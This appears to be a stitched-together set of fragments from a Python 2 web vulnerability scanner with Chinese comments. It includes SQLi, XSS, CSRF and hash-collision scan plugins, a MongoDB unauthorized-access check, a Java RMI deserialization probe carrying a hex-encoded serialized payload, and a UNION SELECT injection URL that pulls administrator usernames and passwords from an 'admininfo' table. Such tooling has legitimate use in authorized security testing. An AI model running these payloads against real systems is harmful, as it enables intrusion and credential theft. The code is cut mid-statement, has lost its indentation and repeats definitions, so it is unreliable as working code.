def check():
while 1:
data=r.lpop('data')
if data:
print "[ ------------- CHECK DATA ------------- ]"
jsonData=json.loads(data)
jsonData=byteify(jsonData)
print "CHECKING SQLI"
main(SqliScan(jsonData))
print "CHECKING XSS"
main(XssScan(jsonData))
print "CHECKING CSRF"
main(CsrfScan(jsonData))
print "CHECKING HASHCOLLISISON"
main(HashcollisionScan(jsonData))
print "[ ------------- WAITING NEXT ------------- ]"
else:
time.sleep(10)
def check():
datas = r.lrange('data', 0, -1)
for data in datas:
if data:
print "[ ------------- CHECK DATA ------------- ]"
jsonData = json.loads(data)
jsonData = byteify(jsonData)
#print "CHECKING SQLI"
#main(SqliScan(jsonData))
print "CHECKING XSS"
main(XssScan(jsonData))
print "CHECKING CSRF"
main(CsrfScan(jsonData))
print "CHECKING HASHCOLLISISON"
main(HashcollisionScan(jsonData))
print "[ ------------- WAITING NEXT ------------- ]"
else:
time.sleep(10)
},
"description": "",
"error": "",
})
def verify(self):
host = self.option.host
port = self.option.port
try:
conn = pymongo.MongoClient(host=host, port=port)
db_names = conn.database_names()
except Exception, e:
self.result.error = "连接发生错误: {error}".format(error=str(e))
return
self.result.status = True
self.result.data.db_info.db_name = str(db_names)
self.result.description = "目标 {host} 的 mongodb 可以未授权访问, 数据库名: {db_names}".format(
host=self.option.host,
db_names=str(db_names)
)
def exploit(self):
self.verify()
if __name__ == '__main__':
from modules.main import main
main(TangScan())
"{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e,"
"oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format(
domain=self.option.url))
try:
response = requests.get(exp_url,
cookies=cookies,
timeout=15,
verify=False)
except Exception, e:
self.result.error = str(e)
return
re_result = re_userinfo_pattern.findall(response.content)
if len(re_result) == 0:
self.result.status = False
return
self.result.status = True
self.result.data.user_info.username = re_result[0][0]
self.result.data.user_info.password = re_result[0][1]
self.result.description = "目标 {url} 存在sql注入, 目标管理员用户: {username}, 密码: {password}".format(
url=self.option.url,
username=self.result.data.user_info.username,
password=self.result.data.user_info.password)
if __name__ == '__main__':
from modules.main import main
main(TangScan())
javajsondata) - 2.3 * trantime
IfExist = False
for name in times:
if times[name] > limit:
print "Probably have HashCollision==>",
payload = "TYPE : " + name + " SERVER RUNNING TIME : " + str(
times[name])
self.payloads.append(payload)
IfExist = True
return IfExist
except:
print "-------------connect error-------------"
return False
def result(self):
"""
攻击类型
:return:
"""
pass
if __name__ == '__main__':
from modules.main import main
main(HashcollisionScan())
main(HashcollisionScan())
main(HashcollisionScan())
main(HashcollisionScan())
main(HashcollisionScan())
if "Payload" in row:
payload = row.split(": ")[1]
self.payloads.append(payload)
if "Parameter:" in row:
prepara = row.split(": ")[1]
#prepare如 "#1* (URI)"
if "URI" in prepara:
# prepare由此截取出一个数字
prepara = prepara.split("#")[1].split("*")[0]
para = URI[int(prepara) - 1] + "(GET)"
#print chardet.detect(URI[int(prepara)-1])
elif "POST" in prepara:
prepara = prepara.split("#")[1].split("*")[0]
para = POST[int(prepara) - 1] + "(POST)"
self.paras.append(para)
return True
#file_data="success: [",vul_time,"] url:",url," payload:",payload," cookie:",cookie,"","\n"
def result(self):
"""
攻击类型
:return:
"""
pass
if __name__ == '__main__':
from modules.main import main
main(SqliScan())
time.localtime(time.time()))
if 'Success' in stdout:
self.payloads.append(scanurl)
self.paras.append(psbkey)
break
def changePara(self, para):
qs = ""
for key in para:
val = para[key]
if qs:
#qs += "&" + urllib.quote(key) + "=" + urllib.quote(val)
qs += "&" + key + "=" + val
else:
#qs += urllib.quote(key) + "=" + urllib.quote(val)
qs += key + "=" + val
return qs
def result(self):
"""
攻击类型
:return:
"""
pass
if __name__ == '__main__':
from modules.main import main
main(XssScan())
except:
##print "无COOKIE ————————————————"
cookie = ""
#print cookie
csrf = csrfCheck()
forms = csrf.check(url, cookie)
#print forms
if len(forms) == 0:
return False
else:
#print url
for form in forms:
#self.plugin_info["target"] += " -- 表单:"
payload = re.findall("<form[\s\S]*?>", form)[0]
self.payloads.append(payload)
return True
#csrf.show(result)
def result(self):
"""
攻击类型
:return:
"""
pass
if __name__ == '__main__':
#print "你好"
from modules.main import main
main(CsrfScan())
#coding:utf-8
import redis
import json
from csrf import CsrfScan
from sqli import SqliScan
from modules.main import main
from xss import XssScan
import time
r = redis.Redis(host='127.0.0.1', port=6379, db=0)
#while True:
datas = r.lrange('data', -1, -1)
#print datas
for data in datas:
#print data
if data:
jsonData = json.loads(data)
exist = main(
XssScan(jsonData)
) #传入的字典需要由插件判断是否存在某key,如cookie可能不存在,在进行 data['coookie']提取时会报错
if exist:
"[ 检测出存在漏洞 ]"
else:
print "不存在"
else:
print "NO DATA"
"severity": self.level.high, # 漏洞等级
"privileged": False, # 是否需要登录
"target": self.target #漏洞目标
}
def match(self):
"""
匹配是否调用此插件
:return:
"""
return True
def check(self):
"""
验证类型,尽量不触发waf规则
:return:
"""
pass
def result(self):
"""
攻击类型
:return:
"""
pass
if __name__ == '__main__':
from modules.main import main
main(MeScan())
# /usr/bin/env python
# coding:utf-8
# author:ZhaoHu
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from modules import main
if __name__ == '__main__':
main.main()
"b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \
"001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \
"000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \
"100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \
"4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \
"647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \
"e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870"
send_data_first = binascii.a2b_hex(send_packet_first)
send_data_second = binascii.a2b_hex(send_packet_second)
sock.send(send_data_first)
recv_packet = sock.recv(1024)
ip = recv_packet[3:-4]
time.sleep(1)
sock.send(send_data_second)
packet = sock.recv(1024)
packet = sock.recv(1024)
if ip in packet:
self.result.status = True
self.result.data.infos = '存在 Java RMI 反序列化代码执行'
except:
print "请检查源码"
def exploit(self):
if self.result.exp_status:
print " debug test"
if __name__ == '__main__':
from modules.main import main
main(PLScan())
